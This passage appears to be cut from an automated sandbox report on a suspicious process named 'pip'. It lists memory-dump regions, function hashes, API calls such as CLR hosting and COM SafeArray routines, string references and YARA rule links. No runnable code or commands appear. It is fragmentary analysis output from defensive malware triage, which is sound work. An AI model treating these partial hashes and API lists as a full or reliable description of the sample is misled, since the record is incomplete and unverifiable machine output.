Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad__cftoe
String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
API String ID: 1275574042-506955582
Opcode ID: 3bc4acd84e0519ad5f92ce1ee4d0bad5b479b984a5441ea236949bf12b4d767a
Instruction ID: 6e4f8015d78fa80916590dda9e0fab7a4ccb7db85a370472fd40767b60085a1c
Opcode Fuzzy Hash: 3bc4acd84e0519ad5f92ce1ee4d0bad5b479b984a5441ea236949bf12b4d767a
Instruction Fuzzy Hash: 80915771E042899FCB04DFE8C8809AEBBB4FF49314F24866DE169EB750D735A906CB54

Uniqueness

Uniqueness Score: -1.00%

Function 06F826F8 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f7b28a9f3253222c8087d0e7d1c23536158439c0e37b2ae3a27b5fe95c4f97
Instruction ID: 9b82f2d921f162cebaf10756a6f3e92fbaf9072c2350889c962a2d0858eca248
Opcode Fuzzy Hash: 13f7b28a9f3253222c8087d0e7d1c23536158439c0e37b2ae3a27b5fe95c4f97
Instruction Fuzzy Hash: 10328274E012289FDB64DFA5C890BEDBBB2AF89300F1081AAD509A7354DB746E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06F826E0 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5966ce48e7b534e3c0e5d9f419c6c193d9bca818400bc4268e5014078bd45e
Instruction ID: a7e29490a2d1494834d895a8757e8ebd3d2045eb47a8fab910c0de6c0c620c2e
Opcode Fuzzy Hash: ab5966ce48e7b534e3c0e5d9f419c6c193d9bca818400bc4268e5014078bd45e
Instruction Fuzzy Hash: 2C91E574E012289FDB64DF69C840BDDBBB2BF89300F0481EAD408AB355DB745A85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 032AF118 Relevance: 90.7, Strings: 72, Instructions: 688
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'tq, xrefs: 032AF676
4'tq, xrefs: 032AFB72
4'tq, xrefs: 032AFB46
4'tq, xrefs: 032AF154
4'tq, xrefs: 032AF85A
4'tq, xrefs: 032AF7AA
4'tq, xrefs: 032AFC4E
4'tq, xrefs: 032AF26C
4'tq, xrefs: 032AF2D5
4'tq, xrefs: 032AF3CA
4'tq, xrefs: 032AFBF6
4'tq, xrefs: 032AFA96
4'tq, xrefs: 032AF28F
4'tq, xrefs: 032AF9BA
4'tq, xrefs: 032AF384
4'tq, xrefs: 032AF31B
4'tq, xrefs: 032AF177
4'tq, xrefs: 032AF54B
4'tq, xrefs: 032AF5C6
4'tq, xrefs: 032AF6FA
4'tq, xrefs: 032AF59A
4'tq, xrefs: 032AF752
4'tq, xrefs: 032AF962
4'tq, xrefs: 032AFBCA
4'tq, xrefs: 032AF77E
4'tq, xrefs: 032AFAEE
4'tq, xrefs: 032AF410
4'tq, xrefs: 032AF1BD
4'tq, xrefs: 032AF886
4'tq, xrefs: 032AF479
4'tq, xrefs: 032AF19A
4'tq, xrefs: 032AF82E
4'tq, xrefs: 032AF1E0
4'tq, xrefs: 032AF61E
4'tq, xrefs: 032AF8B2
4'tq, xrefs: 032AF433
4'tq, xrefs: 032AF249
4'tq, xrefs: 032AF936
4'tq, xrefs: 032AF505
4'tq, xrefs: 032AFB9E
4'tq, xrefs: 032AF33E
4'tq, xrefs: 032AF49C
4'tq, xrefs: 032AF4BF
4'tq, xrefs: 032AF802
4'tq, xrefs: 032AFAC2
4'tq, xrefs: 032AF90A
4'tq, xrefs: 032AF203
4'tq, xrefs: 032AFA12
4'tq, xrefs: 032AF3ED
4'tq, xrefs: 032AF64A
4'tq, xrefs: 032AF8DE
4'tq, xrefs: 032AFA6A
4'tq, xrefs: 032AF726
4'tq, xrefs: 032AF7D6
4'tq, xrefs: 032AF361
4'tq, xrefs: 032AF226
4'tq, xrefs: 032AFC22
4'tq, xrefs: 032AF2B2
4'tq, xrefs: 032AF6CE
4'tq, xrefs: 032AF4E2
4'tq, xrefs: 032AF56E
4'tq, xrefs: 032AFB1A
4'tq, xrefs: 032AF6A2
4'tq, xrefs: 032AF528
4'tq, xrefs: 032AFA3E
4'tq, xrefs: 032AF9E6
4'tq, xrefs: 032AF3A7
4'tq, xrefs: 032AF98E
4'tq, xrefs: 032AF5F2
4'tq, xrefs: 032AF131
4'tq, xrefs: 032AF456
4'tq, xrefs: 032AF2F8

Memory Dump Source

Source File: 00000016.00000002.2908649519.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32a0000_pip.jbxd

Similarity

API ID:
String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq
API String ID: 0-3161311858
Opcode ID: 452da229a2aa44493d6f67904ea191a7653a8bcdeb4a58d453c38aa4e71f2c62
Instruction ID: f87014edfc55274205100685737fd9adead69b37a9cc1f1c8e8a6c67a916e0fb
Opcode Fuzzy Hash: 452da229a2aa44493d6f67904ea191a7653a8bcdeb4a58d453c38aa4e71f2c62
Instruction Fuzzy Hash: 7572C8B0A4420A9FCF59EFB9E8906DDBBB1FF84300F505999D40AAB250DB312E55CF52

Uniqueness

Uniqueness Score: -1.00%

Function 6CF09357 Relevance: 41.0, APIs: 21, Strings: 1, Instructions: 2492COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF084BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF084D2
SafeArrayGetElement.OLEAUT32 ref: 6CF0850A
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF094C1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF094D4
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF0950C
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF097A4
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF097B7
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF097F2

Part of subcall function 6CF03A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF03B71
Part of subcall function 6CF03A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF03B83

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF09D5F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF09D72
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF09DAF

Part of subcall function 6CF03A90: SafeArrayDestroy.OLEAUT32(?), ref: 6CF03BCF

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF0A1BC
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF0A1CF
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 6CF0A20C
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Strings

A, xrefs: 6CF0AD44

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: A
API String ID: 959723449-3554254475
Opcode ID: c8ea5a200b45f5440e4a2b81a3725584a79c26a8bf4509bbde0b3af4f6c06b0c
Instruction ID: 1d26c352f781ceddf6fe47e055e1de06393529cc1b5271c783dc3257ea1c32fd
Opcode Fuzzy Hash: c8ea5a200b45f5440e4a2b81a3725584a79c26a8bf4509bbde0b3af4f6c06b0c
Instruction Fuzzy Hash: DA23B071A01204DFDB00DFA4C894FDD77B9AF49708F248198EA09AF792DB71E985DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF02970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF029F6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF02A08
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF02A2F
VariantInit.OLEAUT32(?), ref: 6CF02ABB
VariantInit.OLEAUT32(?), ref: 6CF02B3F
VariantClear.OLEAUT32(?), ref: 6CF02C04
VariantClear.OLEAUT32(?), ref: 6CF02C0B
VariantClear.OLEAUT32(?), ref: 6CF02C12
VariantClear.OLEAUT32(?), ref: 6CF02C96
VariantClear.OLEAUT32(?), ref: 6CF02C9D
VariantClear.OLEAUT32(?), ref: 6CF02CD6
VariantClear.OLEAUT32(?), ref: 6CF02CDD
VariantClear.OLEAUT32(?), ref: 6CF02CE4
SafeArrayDestroy.OLEAUT32(?), ref: 6CF02D1B
VariantClear.OLEAUT32(?), ref: 6CF02D45
VariantClear.OLEAUT32(?), ref: 6CF02D4C
VariantClear.OLEAUT32(?), ref: 6CF02D53

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
String ID:
API String ID: 214056513-0
Opcode ID: eabc33947ce9b50e2622efe4deb8184f5466a4dc9bf8d92691ec313e682c6e73
Instruction ID: b079428b9c51db143f8c3319d671e75e6720b01be0c638dac67768528cbff3a8
Opcode Fuzzy Hash: eabc33947ce9b50e2622efe4deb8184f5466a4dc9bf8d92691ec313e682c6e73
Instruction Fuzzy Hash: 97C17B716083419FD700DFA8C898A5BBBF8BF89704F20895DF6A5C7260C775E845DB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFAF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CEFAF75
VariantInit.OLEAUT32(?), ref: 6CEFAF7C
VariantInit.OLEAUT32(?), ref: 6CEFAF83
VariantCopy.OLEAUT32(?,?), ref: 6CEFB00D
VariantClear.OLEAUT32(?), ref: 6CEFB027
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEFB19C
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEFB1AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 6CEFB1C5
_memmove.LIBCMT ref: 6CEFB1E6
SafeArrayUnaccessData.OLEAUT32(?), ref: 6CEFB1EF
VariantClear.OLEAUT32(?), ref: 6CEFB237
VariantClear.OLEAUT32(?), ref: 6CEFB23E
VariantClear.OLEAUT32(?), ref: 6CEFB245
VariantClear.OLEAUT32(?), ref: 6CEFB29D
VariantClear.OLEAUT32(?), ref: 6CEFB2A4
VariantClear.OLEAUT32(?), ref: 6CEFB2AB

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
String ID:
API String ID: 3403836469-0
Opcode ID: 38f7f8fce9302e469bb24d7bc133f611c7a7878193849a2f2cd60c75d45df380
Instruction ID: 057afff3d4b8c6eb88905f59755d282c324129b819b177e5e2d7d99b52c807a6
Opcode Fuzzy Hash: 38f7f8fce9302e469bb24d7bc133f611c7a7878193849a2f2cd60c75d45df380
Instruction Fuzzy Hash: 95C13AB2A043419FD700DF68C884A5ABBF9FB89304F24896DE669C7751D731E906CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CF0D4B3
VariantInit.OLEAUT32 ref: 6CF0D4C5
VariantInit.OLEAUT32(?), ref: 6CF0D4CC
_malloc.LIBCMT ref: 6CF0D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF0D58B
SafeArrayCreateVector.OLEAUT32 ref: 6CF0D5A6
SafeArrayAccessData.OLEAUT32 ref: 6CF0D5B8

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
String ID:
API String ID: 1552365394-0
Opcode ID: 7cf26a3e7f7071b83e6c1898223326f6b0602d229985833c45e0e22a023fd1cf
Instruction ID: c9a80273a1ba7cdaf6ad3b7be8498153ab17325ff3a0dcf871023e14867c711e
Opcode Fuzzy Hash: 7cf26a3e7f7071b83e6c1898223326f6b0602d229985833c45e0e22a023fd1cf
Instruction Fuzzy Hash: 0DB155B66083009FD314CF28C890A6BBBF9FF89718F14895DE89987751E730E905DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CF0D4B3
VariantInit.OLEAUT32 ref: 6CF0D4C5
VariantInit.OLEAUT32(?), ref: 6CF0D4CC
_malloc.LIBCMT ref: 6CF0D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF0D58B
SafeArrayCreateVector.OLEAUT32 ref: 6CF0D5A6
SafeArrayAccessData.OLEAUT32 ref: 6CF0D5B8
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF0D601
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF0D63E

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
String ID:
API String ID: 2723946344-0
Opcode ID: 22f2b42f5719600e8a41be4cb735e3395617a909a1511c941a2046d58d85ddd2
Instruction ID: 0d2573e2e746eb1bfb52a664e6e64d00870e867ff743f795002e5dc38b0ddf09
Opcode Fuzzy Hash: 22f2b42f5719600e8a41be4cb735e3395617a909a1511c941a2046d58d85ddd2
Instruction Fuzzy Hash: BF9166B56083019FD314CF28C890E6BBBF9BF89708F14895DE8958B351D730E905DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF05140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF05177

Part of subcall function 6CF12820: _malloc.LIBCMT ref: 6CF12871

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6CF051B9
SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CF051D5
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6CF051E5
_memmove.LIBCMT ref: 6CF051FF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF05208
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF0522C
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF05263
VariantClear.OLEAUT32(?), ref: 6CF0526C
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CF052AD
VariantClear.OLEAUT32(?), ref: 6CF052B6
SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6CF052D2
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF0534E
VariantClear.OLEAUT32(?), ref: 6CF05358

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
String ID:
API String ID: 452649785-0
Opcode ID: a522041256cb0854e3e0dd5d618eed4fa6235f5958ad17eac00b46a6c73b88e2
Instruction ID: 0f0bf05a76f3a13a9a87e1cb56ec798ea4aa743f05c9b6f9d8d511437293f5fe
Opcode Fuzzy Hash: a522041256cb0854e3e0dd5d618eed4fa6235f5958ad17eac00b46a6c73b88e2
Instruction Fuzzy Hash: 287159B1A1020AEFDB01DFA5C894BAFBBB9FF49704F108119E915D7640D7B4E905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CF044C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF044FF
VariantInit.OLEAUT32(?), ref: 6CF04505
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF04516
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF04551
VariantClear.OLEAUT32(?), ref: 6CF0455A
SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CF04579
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF04594
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CF045B5
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CF045CE
std::tr1::_Xweak.LIBCPMT ref: 6CF0475A
SafeArrayDestroy.OLEAUT32(?), ref: 6CF04777
VariantClear.OLEAUT32(?), ref: 6CF04787
VariantClear.OLEAUT32(?), ref: 6CF0478D

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
String ID:
API String ID: 1304965753-0
Opcode ID: 40494b5f4889d9cb7759fe7da41f3c9e7bab92c755f9ce2e462a53fdd39f9ec4
Instruction ID: 3843c0054ed9a17abcdcf48158546e5d34c4d9e2fcea2e7840ba45d3a298de5e
Opcode Fuzzy Hash: 40494b5f4889d9cb7759fe7da41f3c9e7bab92c755f9ce2e462a53fdd39f9ec4
Instruction Fuzzy Hash: 35A15C75A012069BDB54DBA5C994EAFB7B9FF8C710F14462CE506ABB80CA30E941DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF0BF3D
VariantInit.OLEAUT32(?), ref: 6CF0BF4A
VariantInit.OLEAUT32(?), ref: 6CF0BF50
VariantInit.OLEAUT32(?), ref: 6CF0BF56
VariantInit.OLEAUT32 ref: 6CF0C04D
VariantCopy.OLEAUT32(?,?), ref: 6CF0C054
VariantInit.OLEAUT32 ref: 6CF0C085
VariantCopy.OLEAUT32(?,?), ref: 6CF0C08C
VariantClear.OLEAUT32(?), ref: 6CF0C118
VariantClear.OLEAUT32(?), ref: 6CF0C11E
VariantClear.OLEAUT32(?), ref: 6CF0C124
VariantClear.OLEAUT32(?), ref: 6CF0C12A

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 199aeaa842ea35f2d370784dfb6e069bd4b799b5a0b22e0d98d41e8b2ace551d
